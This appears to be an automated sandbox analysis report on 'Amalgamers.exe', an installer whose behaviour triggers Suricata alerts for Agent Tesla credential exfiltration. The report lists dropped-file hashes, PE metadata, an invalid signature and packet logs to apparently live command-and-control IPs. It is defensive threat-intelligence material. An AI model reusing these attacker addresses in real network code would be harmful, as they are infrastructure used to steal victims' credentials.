Encrypted:	false
SSDEEP:	768:CvIX3g9acDkuE8zXgrmOhShQF8gFuZadsvV97nSx89Ra2VAPKRdimo31v9BzEXmQ:Wuwa6FdB7kyA
MD5:	FA6863BE9E976E93018B15628070BF7C
SHA1:	7B288424CEC51F8E2EF38519AE59E6B1D901416C
SHA-256:	BCF7E7663451AE349B3B8458845CF99E3ED8354D800DD39D5F4BA7A4205BF7A1
SHA-512:	CDE30C6176879BE839EC30F06068D756E9536308B6336888EB6A26B06E8D56D8674796C19B559F84A4F0389A39922BAF335D1AD9A388B29315DD84338BD90D03
Malicious:	false
Preview:	......................i....................D..........................................v...........M.................................................................................................................s.... ............................................................].........o..................................%............9................................................)............l...............J=......C..............................+..................................................................b..............................&.................0............................v.........G..............................................J............................................................~..3....(...................,.....<.....................................9......2.........................................................................................................=......................................................................................i...........

C:\Users\user\AppData\Local\Reglements216\brunmaskets.ryg

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	data
Category:	dropped
Size (bytes):	472128
Entropy (8bit):	1.2500192207194354
Encrypted:	false
SSDEEP:	1536:dpye9Lw5Dl0MYAnajCo6o097EAgUC7lLjs0k:dIxDl0NAn5E0K35G
MD5:	7098E71A650191D33BB82D0B4E2DEC25
SHA1:	EDDA248F8FDC86D8420FC4BE21EA79DCC27D2CF8
SHA-256:	E77F9F89C0D096EF18C9FA5C644B93F028F860DB95E4719E2A891E36BDF72D13
SHA-512:	A16CF0CB8AC38E554B7BE7EC04BC067AECD5864183EB960004FFCEAE603A21C0B817EE5D39F43115E8970B23922ECC5F696B4AB9546FA182762132E1EC3D8D0F
Malicious:	false
Preview:	.....d...............M..............!.......L.................................8.....U.............................................................R........................................................8.............X.....................`.............................E................................T..........H...........................Ek..................................................M.......'.............V.......Y...................................O.......................#.m..X...........................~.................$..:............................."..........................4......5...........d..........................W....\|`...............................................w........................................................^.............Z...\.....................6................................................................................................^.."........................V........C........G..S[..................).........................................

C:\Users\user\AppData\Local\Reglements216\leptometer.anm

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	data
Category:	dropped
Size (bytes):	449259
Entropy (8bit):	1.2591643282176364
Encrypted:	false
SSDEEP:	1536:6tLYXkMJYLHxnrm5SOJuf/saTv3cAO3PlJm+nr2/GF4:6t0JYLCXuJv38fi+r2/GF
MD5:	DB5B6812D41435A4D58A9A005197324D
SHA1:	208BDE38448423C9736331740F1715C573585F9D
SHA-256:	26362E1BCB43858D0921B95348DE11948141C662B249CE279DC584CCAB565327
SHA-512:	62C0400CA7951AD1E24007D24F6F41CCF7FD2B3EA67CEC220D82CDC52DCBB93FAC8A6CBA7CEF4522190C00DC30DB20F520C9B6666068AC0B09EFFD28D2E7E90A
Malicious:	false
Preview:	...#...(............................................................_.................................................................................................................7...........................................................................`....U................................\|..............V........................[.........~........................;.....#.............-........................................................}.............................2...........f......................................................................'..............d...................................................._.........y.......G<...........}......................................................4.........,............................................x.......................5................Y..............7...1...............................Y...........i................km.......~..................................{...........:....................................................

C:\Users\user\AppData\Local\Reglements216\ligedannede.afs

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	data
Category:	dropped
Size (bytes):	220386
Entropy (8bit):	1.2494539894139274
Encrypted:	false
SSDEEP:	768:dk0GCeW7H+LxETH05l7BKcpoHEmE9MSonQpCovaGbNxgEeKhlmaY4IFUyN1ptbGW:+JYmDEFlN1PFInmRpptl
MD5:	0BEFCE0893D830815D7995ED3E2F307B
SHA1:	4D27BBE8FCAB8FA8B5C30634C8442C3CE883345F
SHA-256:	81F8CD084521DD7D248374A9A4551790C0C7EDD2F5A30C2C1A8FBF67CAAA6372
SHA-512:	EA721D2D1E54EE8397C2C6C1A14F973F2573E95D1C2DF1B52C3368C0E7364AA719D1F39FF635AAF206BA0A1860B3B2B6864068BF37931ADC8D16D81D1F93EBD9
Malicious:	false
Preview:	..............................N.......................R............................................;.............................._........................l..........U................................................h....................................x...............I............................................................................. ................n..............................................M.........................?....................x..........u.................................................................................................Q....k..........................................'.................................................j...................................................................................................w.......C...........................................................................................................................h.%....................................a.........................................Q......................

C:\Users\user\AppData\Local\Reglements216\mononitride.mis

Download File

Process:	C:\Users\user\Desktop\Amalgamers.exe
File Type:	data
Category:	dropped
Size (bytes):	272334
Entropy (8bit):	1.2494878642055454
Encrypted:	false
SSDEEP:	768:vkFEzMeu6cxURq5nyP2N2oMCCqBHjCaTwS6nNrUlsP8PogoJOhQuKOXM7C6wTurp:ewZ2N2IMrUhhd8GE8Qmet
MD5:	A182D70079F2B7624FEC8D768657838F
SHA1:	C6BE4431D6A7C954080B8609C96BBAFDF6FB3FA9
SHA-256:	4C7BEF24AFE77BD9FA815C592BAE7A2C89825B2D4C972D45D4C1154D325AB906
SHA-512:	258A37897E2BC939766FC109974C13B0AE814B3C5935913B728FC9E44AEA25722C2E5496CA7B2EAAEA68459450B8EA91B97924D92B7398FD6295839C3DF3D46F
Malicious:	false
Preview:	.....................................b..........................................9................................................................D.............r............O..........o.....3....N.......w........................................................J...2..................N.............1...............H..l7.....(...7.............................A..................I............................................................................+......H............................................G.......................(.....................Z.................................!.........A.....................................................................................................(..........a........................................L...........................>................f.............................................................F.................................................t.........................................l........q...........5........{..`............4......

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33ofichi.22b.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cujddb1m.1an.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgd0ppe4.4lp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlr3vrjj.451.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.854546227436502
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Amalgamers.exe
File size:	942'432 bytes
MD5:	e2a5b947ac8266e79cc0c9faff051849
SHA1:	a128aac0de4bbf879f7df28526e6b59a30fb82b1
SHA256:	b5276a247be390e58bbb52535b1437f1aae13ca70930ce885c8aad870ba01053
SHA512:	e44b6dc1e3043c5aa4e030180b071c8e6b007672feacf9a6044a656de55db499c9f34c3ed9a1d0553deddd6fb1c241226f70348b178326292dfdb281ba6edde5
SSDEEP:	24576:IyG1qpfQfJtOutBz+sTrMEnPaS9Jv8MPtquNs:D8qeRg8BzPMEyS3LPfNs
TLSH:	951523E2FE54D5F5C5B652B08B77AA98CE12ADA6654129332603338F397B101C71F38B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...)..\.................d...\|.....

File Icon


Icon Hash:	4d2e36276b2c2f1e

Static PE Info

General

Entrypoint:	0x40320c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F29 [Sat Dec 15 22:24:41 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Allotypies, O=Allotypies, L=Pengorffwysfa, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	09/01/2024 07:17:36 08/01/2027 07:17:36
Subject Chain	CN=Allotypies, O=Allotypies, L=Pengorffwysfa, C=GB
Version:	3
Thumbprint MD5:	9DC9AC0C4F10BA13B19BE7DA0B467514
Thumbprint SHA-1:	E32C0D98B51DE07D43668B668DFD6299419466CE
Thumbprint SHA-256:	CC4F1C667AF26C71080FA4E10FA6DA45F61C0937598A075F7DD8E11287032457
Serial:	715987EBF17283939D8427A933D97793F1B45E95

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A0h]
call dword ptr [0040809Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F40Ch], eax
je 00007FEA2C4FB453h
push ebx
call 00007FEA2C4FE52Ah
cmp eax, ebx
je 00007FEA2C4FB449h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007FEA2C4FE4A6h
push esi
call dword ptr [00408098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FEA2C4FB42Dh
push 0000000Ah
call 00007FEA2C4FE4FEh
push 00000008h
call 00007FEA2C4FE4F7h
push 00000006h
mov dword ptr [0042F404h], eax
call 00007FEA2C4FE4EBh
cmp eax, ebx
je 00007FEA2C4FB451h
push 0000001Eh
call eax
test eax, eax
je 00007FEA2C4FB449h
or byte ptr [0042F40Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429830h
call dword ptr [00408178h]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x853c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x40000	0x11488	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe5850	0x910
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x628f	0x6400	6cd58568c5809fdd0c7dcb006e4acdba	False	0.6700390625	data	6.442207080714446	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x135c	0x1400	b27ba0846d4bbf5bff764f5a5c418a97	False	0.4611328125	data	5.240043476337556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25518	0x600	12c02de2bdc517e2722ceeb84aff8b34	False	0.455078125	data	4.04938010159809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x30000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x40000	0x11488	0x11600	b9be6c5b4569a43951d869c84801fc0a	False	0.29055193345323743	data	3.8823683070253874	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x40238	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2831539098544895
RT_DIALOG	0x50a60	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x50ba8	0x120	data	English	United States	0.5104166666666666
RT_DIALOG	0x50cc8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x50de8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x50eb0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x50f10	0x14	data	English	United States	1.15
RT_VERSION	0x50f28	0x220	data	English	United States	0.5202205882352942
RT_MANIFEST	0x51148	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-09T20:46:13.669638+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.4	49730	TCP
2024-11-09T20:46:52.578190+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.4	49736	TCP
2024-11-09T20:47:08.054416+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49797	185.36.171.17	80	TCP
2024-11-09T20:47:13.762981+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49819	86.107.36.93	21	TCP
2024-11-09T20:47:14.515003+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49835	86.107.36.93	35643	TCP
2024-11-09T20:47:14.520299+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49835	86.107.36.93	35643	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2024 20:47:07.011639118 CET	49797	80	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:07.016812086 CET	80	49797	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:07.016891003 CET	49797	80	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:07.016972065 CET	49797	80	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:07.021724939 CET	80	49797	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:08.054354906 CET	80	49797	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:08.054415941 CET	49797	80	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:08.058527946 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:08.058557987 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:08.058617115 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:08.071583033 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:08.071602106 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.402777910 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.402870893 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.493004084 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.493022919 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.493247986 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.493374109 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.546700001 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.587331057 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.799273968 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.799341917 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.799350023 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.799391985 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.930088997 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.930105925 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.930149078 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.930174112 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.930186033 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.930213928 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.930233955 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.931895018 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.931912899 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.931968927 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:09.931977034 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:09.932018042 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.060064077 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.060084105 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.060198069 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.060210943 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.060256958 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.060972929 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.060985088 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.061043978 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.061049938 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.061100960 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.062762976 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.062779903 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.062843084 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.062849045 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.062886953 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.176728964 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.176745892 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.176820993 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.176830053 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.176876068 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.190601110 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.190615892 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.190671921 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.190676928 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.190722942 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.191792011 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.191807032 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.191867113 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.191873074 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.191915989 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.193341017 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.193355083 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.193408966 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.193413973 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.193435907 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.193450928 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.194552898 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.194566011 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.194602013 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.194607019 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.194641113 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.194663048 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.195895910 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.195909977 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.195966005 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.195971966 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.196008921 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.197513103 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.197526932 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.197577953 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.197583914 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.197619915 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.293560982 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.293576002 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.293667078 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.293675900 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.293719053 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.320646048 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.320662022 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.320754051 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.320763111 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.320806980 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.321789980 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.321827888 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.321852922 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.321855068 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:10.321882010 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.321899891 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.321973085 CET	49803	443	192.168.2.4	185.36.171.17
Nov 9, 2024 20:47:10.321985006 CET	443	49803	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:11.371166945 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:11.375993967 CET	21	49819	86.107.36.93	192.168.2.4
